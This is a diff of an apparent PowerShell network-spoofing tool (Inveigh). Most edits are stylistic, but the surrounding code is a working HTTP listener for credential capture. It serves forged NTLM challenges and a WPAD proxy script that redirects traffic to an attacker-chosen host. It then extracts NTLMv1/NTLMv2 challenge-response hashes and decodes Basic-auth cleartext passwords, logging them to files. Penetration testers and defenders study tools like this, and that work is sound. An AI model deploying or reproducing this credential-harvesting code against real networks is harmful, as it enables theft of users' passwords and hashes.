-    $inveigh.status_queue.add("HTTP Authentication = $HTTPAuth")|Out-Null
-    $inveigh.status_queue.add("WPAD Authentication = $WPADAuth")|Out-Null
+    $inveigh.status_queue.Add("HTTP Capture Enabled") > $null
+    $inveigh.status_queue.Add("HTTP Authentication = $HTTPAuth") > $null
+    $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
 
     if($HTTPResponse)
     {
-        $inveigh.status_queue.add("HTTP Custom Response Enabled")|Out-Null
+        $inveigh.status_queue.Add("HTTP Custom Response Enabled") > $null
     }
 
     if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
     {
-        $inveigh.status_queue.add("Basic Authentication Realm = $HTTPBasicRealm")|Out-Null
+        $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null
     }
 
     if($WPADIP -and $WPADPort)
     {
-        $inveigh.status_queue.add("WPAD = $WPADIP`:$WPADPort")|Out-Null
+        $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null
 
         if($WPADDirectHosts)
         {
-            $inveigh.status_queue.add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",")|Out-Null
+            $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null
         }
+
     }
     elseif($WPADResponse -and !$WPADIP -and !$WPADPort)
     {
-        $inveigh.status_queue.add("WPAD Custom Response Enabled")|Out-Null
+        $inveigh.status_queue.Add("WPAD Custom Response Enabled") > $null
     }
 
     if($Challenge)
     {
-        $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null
+        $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
     }
 
     if($MachineAccounts -eq 'n')
     {
-        $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null
+        $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null
+        $inveigh.machine_accounts = $false
     }
+    else
+    {
+        $inveigh.machine_accounts = $true
+    }
+
 }
 else
 {
-    $inveigh.status_queue.add("HTTP Capture Disabled")|Out-Null
+    $inveigh.status_queue.Add("HTTP Capture Disabled") > $null
 }
 
-if($ConsoleOutput -eq 'y')
+if($ConsoleOutput -eq 'Y')
 {
-    $inveigh.status_queue.add("Real Time Console Output Enabled")|Out-Null
+    $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null
     $inveigh.console_output = $true
 }
 else
 {
+
     if($inveigh.tool -eq 1)
     {
-        $inveigh.status_queue.add("Real Time Console Output Disabled Due To External Tool Selection")|Out-Null
+        $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
     }
     else
     {
-        $inveigh.status_queue.add("Real Time Console Output Disabled")|Out-Null
+        $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null
     }
+
 }
 
-if($FileOutput -eq 'y')
+if($FileOutput -eq 'Y')
 {
-    $inveigh.status_queue.add("Real Time File Output Enabled")|Out-Null
-    $inveigh.status_queue.add("Output Directory = $output_directory")|Out-Null
+    $inveigh.status_queue.Add("Real Time File Output Enabled") > $null
+    $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
     $inveigh.file_output = $true
 }
 else
 {
-    $inveigh.status_queue.add("Real Time File Output Disabled")|Out-Null
+    $inveigh.status_queue.Add("Real Time File Output Disabled") > $null
 }
 
 if($RunTime -eq 1)
 {
-    $inveigh.status_queue.add("Run Time = $RunTime Minute")|Out-Null
+    $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
 }
 elseif($RunTime -gt 1)
 {
-    $inveigh.status_queue.add("Run Time = $RunTime Minutes")|Out-Null
+    $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
 }
 
 if($RunCount)
 {
-    $inveigh.status_queue.add("Run Count = $RunCount")|Out-Null
+    $inveigh.status_queue.Add("Run Count = $RunCount") > $null
 }
 
-if($ShowHelp -eq 'y')
+if($ShowHelp -eq 'Y')
 {
-    $inveigh.status_queue.add("Use Get-Command -Noun Inveigh* to show available functions")|Out-Null
-    $inveigh.status_queue.add("Run Stop-Inveigh to stop running Inveigh functions")|Out-Null
+    $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null
+    $inveigh.status_queue.Add("Run Stop-Inveigh to stop running Inveigh functions") > $null
         
     if($inveigh.console_output)
     {
-        $inveigh.status_queue.add("Press any key to stop real time console output")|Out-Null
+        $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
     }
+
 }
 
 if($inveigh.status_output)
 {
+
     while($inveigh.status_queue.Count -gt 0)
     {
+
         if($inveigh.output_stream_only)
         {
-            write-output($inveigh.status_queue[0] + $inveigh.newline)
+            Write-Output($inveigh.status_queue[0] + $inveigh.newline)
             $inveigh.status_queue.RemoveRange(0,1)
         }
         else
         {
+
             switch ($inveigh.status_queue[0])
             {
+
                 "Run Stop-Inveigh to stop running Inveigh functions"
                 {
-                    write-warning($inveigh.status_queue[0])
+                    Write-Warning($inveigh.status_queue[0])
                     $inveigh.status_queue.RemoveRange(0,1)
                 }
+
                 default
                 {
-                    write-output($inveigh.status_queue[0])
+                    Write-Output($inveigh.status_queue[0])
                     $inveigh.status_queue.RemoveRange(0,1)
                 }
+
             }
+
         }
+
     }
+
 }
 
 # Begin ScriptBlocks
 
-# Shared Basic Functions ScriptBlock
+# Shared Basic functions ScriptBlock
 $shared_basic_functions_scriptblock =
 {
-    Function DataLength
+    function DataLength
     {
-        param ([int]$length_start,[byte[]]$string_extract_data)
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
 
         $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)
         return $string_length
     }
 
-    Function DataToString
+    function DataToString
     {
-        param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data)
+        param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data)
 
-        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)])
+        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)])
         $string_data = $string_data -replace "-00",""
-        $string_data = $string_data.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
         return $string_extract
     }
 
-    Function HTTPListenerStop
+    function HTTPListenerStop
     {
-        $inveigh.console_queue.add("$(Get-Date -format 's') - Attempting to stop HTTP listener")
+        $inveigh.console_queue.Add("$(Get-Date -format 's') - Attempting to stop HTTP listener")
         $inveigh.HTTP_client.Close()
         start-sleep -s 1
         $inveigh.HTTP_listener.server.blocking = $false
@@ -451,64 +494,71 @@ $shared_basic_functions_scriptblock =
         Start-Sleep -s 1
         $inveigh.HTTP_listener.Stop()
     }
+
 }
 
 # HTTP Server ScriptBlock - HTTP listener
 $HTTP_scriptblock = 
 { 
-    param ($HTTPAuth,$HTTPBasicRealm,$HTTPResponse,$MachineAccounts,$NBNSPause,$WPADAuth,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount)
+    param ($HTTPAuth,$HTTPBasicRealm,$HTTPResponse,$NBNSPause,$WPADAuth,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount)
 
-    Function NTLMChallengeBase64
+    function NTLMChallengeBase64
     {
 
         $HTTP_timestamp = Get-Date
         $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
-        $HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp))
-        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
 
         if($inveigh.challenge)
         {
             $HTTP_challenge = $inveigh.challenge
             $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
-            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         }
         else
         {
             $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
             $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', ''
-            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         }
 
-        $inveigh.HTTP_challenge_queue.Add($inveigh.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $inveigh.HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge) |Out-Null
+        $inveigh.HTTP_challenge_queue.Add($inveigh.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $inveigh.HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge)  > $null
 
-        [byte[]]$HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,0x00,0x00,0x00,0x05,0x82,0x89,0xa2)`
-            + $HTTP_challenge_bytes`
-            + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00)`
-            + (0x02,0x00,0x06,0x00,0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00)`
-            + (0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,0x00,0x68,0x00,0x6f,0x00)`
-            + (0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00)`
-            + (0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00)`
-            + $HTTP_timestamp`
-            + (0x00,0x00,0x00,0x00,0x0a,0x0a)
+        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+                           0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+                           $HTTP_challenge_bytes +
+                           0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+                           0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+                           0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+                           0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+                           0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+                           0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+                           0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+                           0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+                           0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+                           $HTTP_timestamp +
+                           0x00,0x00,0x00,0x00,0x0a,0x0a
 
         $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
         $NTLM = 'NTLM ' + $NTLM_challenge_base64
         $NTLM_challenge = $HTTP_challenge
         
-        Return $NTLM
-
+        return $NTLM
     }
 
-    $HTTP_WWW_authenticate_header = (0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20) # WWW-Authenticate
+    $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate
     $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count
     $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count
     $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count
 
     if($WPADIP -and $WPADPort)
     {
+
         if($WPADDirectHosts)
         {
-            ForEach($WPAD_direct_host in $WPADDirectHosts)
+
+            foreach($WPAD_direct_host in $WPADDirectHosts)
             {
                 $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
             }
@@ -519,6 +569,7 @@ $HTTP_scriptblock =
         {
             $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
         }
+
     }
     elseif($WPADResponse)
     {
@@ -530,14 +581,14 @@ $HTTP_scriptblock =
 
         $TCP_request = $NULL
         $TCP_request_bytes = New-Object System.Byte[] 1024
-
         $suppress_waiting_message = $false
 
         while(!$inveigh.HTTP_listener.Pending() -and !$inveigh.HTTP_client.Connected)
         {
+
             if(!$suppress_waiting_message)
             {
-                $inveigh.console_queue.add("$(Get-Date -format 's') - Waiting for incoming HTTP connection")
+                $inveigh.console_queue.Add("$(Get-Date -format 's') - Waiting for incoming HTTP connection")
                 $suppress_waiting_message = $true
             }
 
@@ -547,6 +598,7 @@ $HTTP_scriptblock =
             {
                 HTTPListenerStop
             }
+        
         }
 
         if(!$inveigh.HTTP_client.Connected)
@@ -557,7 +609,7 @@ $HTTP_scriptblock =
 
         while ($HTTP_stream.DataAvailable)
         {
-            $HTTP_stream.Read($TCP_request_bytes, 0, $TCP_request_bytes.Length)
+            $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
         }
 
         $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
@@ -565,21 +617,22 @@ $HTTP_scriptblock =
         if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*")
         {
             $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
-            $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
             $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
 
             if($NBNSPause)
             {
-                $inveigh.NBNS_stopwatch = [diagnostics.stopwatch]::StartNew()
+                $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
                 $inveigh.hostname_spoof = $true
             }
+        
         }
 
         if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
         {
             $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
             $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
-            $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
             $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
         }
         else
@@ -587,15 +640,15 @@ $HTTP_scriptblock =
             $authentication_header =  ''
         }
 
-        if(($HTTP_request_raw_URL -match '/wpad.dat') -and ($WPADAuth -eq 'Anonymous'))
+        if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
         {
-            $HTTP_response_status_code = (0x32,0x30,0x30)
-            $HTTP_response_phrase = (0x4f,0x4b)
+            $HTTP_response_status_code = 0x32,0x30,0x30
+            $HTTP_response_phrase = 0x4f,0x4b
         }
         else
         {
-            $HTTP_response_status_code = (0x34,0x30,0x31)
-            $HTTP_response_phrase = (0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64)
+            $HTTP_response_status_code = 0x34,0x30,0x31
+            $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
         }
 
         $HTTP_type = "HTTP"
@@ -604,19 +657,19 @@ $HTTP_scriptblock =
 
         if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $inveigh.HTTP_client.Client.Handle)
         {
-            $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $HTTP_request_raw_URL + " received from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)
-            $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $HTTP_request_raw_URL + " received from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)])
+            $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $HTTP_request_raw_URL + " received from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $HTTP_request_raw_URL + " received from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)])
         }
 
         if($authentication_header.startswith('NTLM '))
         {
             $authentication_header = $authentication_header -replace 'NTLM ',''
-            [byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
-            $HTTP_response_status_code = (0x34,0x30,0x31)
+            [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+            $HTTP_response_status_code = 0x34,0x30,0x31
             
             if ($HTTP_request_bytes[8] -eq 1)
             {
-                $HTTP_response_status_code = (0x34,0x30,0x31)
+                $HTTP_response_status_code = 0x34,0x30,0x31
                 $NTLM = NTLMChallengeBase64
             }
             elseif ($HTTP_request_bytes[8] -eq 3)
@@ -626,8 +679,7 @@ $HTTP_scriptblock =
                 $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes
                 $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes
                 $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes
-                
-                [string]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $inveigh.HTTP_client.Client.RemoteEndpoint.Port + '*'
+                [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $inveigh.HTTP_client.Client.RemoteEndpoint.Port + '*'
                 $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
                 $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(","))+1)
                        
@@ -642,7 +694,6 @@ $HTTP_scriptblock =
                     
                 $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes
                 $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes
-                        
                 $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes
                 $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes
         
@@ -652,20 +703,21 @@ $HTTP_scriptblock =
                     $NTLM_response = $NTLM_response.Insert(48,':')
                     $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
                     
-                    if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
                     {    
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
-                        $inveigh.NTLMv1_file_queue.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.NTLMv1_list.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
                         
                         if($inveigh.file_output)
                         {
-                            $inveigh.console_queue.add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
-                        }                   
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                        }
+
                     }
 
-                    $HTTP_response_status_code = (0x32,0x30,0x30)
+                    $HTTP_response_status_code = 0x32,0x30,0x30
                     $HTTP_client_close = $true
                     $NTLM_challenge = ''
                 }
@@ -675,23 +727,24 @@ $HTTP_scriptblock =
                     $NTLM_response = $NTLM_response.Insert(32,':')
                     $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
 
-                    if((($NTLM_challenge -ne '') -and ($NTLM_response -ne '')) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $HTTP_NTLM_user_string.EndsWith('$')))))
+                    if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
                     {
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
-                        $inveigh.NTLMv2_file_queue.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.NTLMv2_list.add($inveigh.HTTP_NTLM_hash)
-                        $inveigh.console_queue.add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
                         
                         if($inveigh.file_output)
                         {
-                            $inveigh.console_queue.add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
                         }
                         
                     }
+
                 }
                 
-                $HTTP_response_status_code = (0x32,0x30,0x30)
-                $HTTP_response_phrase = (0x4f,0x4b)
+                $HTTP_response_status_code = 0x32,0x30,0x30
+                $HTTP_response_phrase = 0x4f,0x4b
                 $NTLM_auth = $true
                 $HTTP_client_close = $true
                 $NTLM_challenge = ''
@@ -699,23 +752,25 @@ $HTTP_scriptblock =
             else
             {
                 $NTLM = 'NTLM'
-            }    
+            }
+
         }
         elseif($authentication_header.startswith('Basic '))
         {
-            $HTTP_response_status_code = (0x32,0x30,0x30)
-            $HTTP_response_phrase = (0x4f,0x4b)
+            $HTTP_response_status_code = 0x32,0x30,0x30
+            $HTTP_response_phrase = 0x4f,0x4b
             $authentication_header = $authentication_header -replace 'Basic ',''
             $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
-            $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)])
-            $inveigh.cleartext_file_queue.add($cleartext_credentials)
-            $inveigh.cleartext_list.add($cleartext_credentials)
-            $inveigh.console_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)])
+            $inveigh.cleartext_file_queue.Add($cleartext_credentials)
+            $inveigh.cleartext_list.Add($cleartext_credentials)
+            $inveigh.console_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)
 
             if($inveigh.file_output)
             {
-                $inveigh.console_queue.add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
-            }     
+                $inveigh.console_queue.Add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
+            }
+                 
         }
 
         $HTTP_timestamp = Get-Date -format r
@@ -741,84 +796,89 @@ $HTTP_scriptblock =
         if(($HTTPAuth -eq 'NTLM' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
         { 
             $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
-            $HTTP_message_bytes = (0x0d,0x0a)
+            $HTTP_message_bytes = 0x0d,0x0a
             $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
             $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
 
-            [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
-                + $HTTP_response_status_code`
-                + (0x20)`
-                + $HTTP_response_phrase`
-                + (0x0d,0x0a)`
-                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
-                + (0x44,0x61,0x74,0x65,0x3a)`
-                + $HTTP_timestamp`
-                + (0x0d,0x0a)`
-                + $HTTP_WWW_authenticate_header`
-                + $NTLM`
-                + (0x0d,0x0a)`
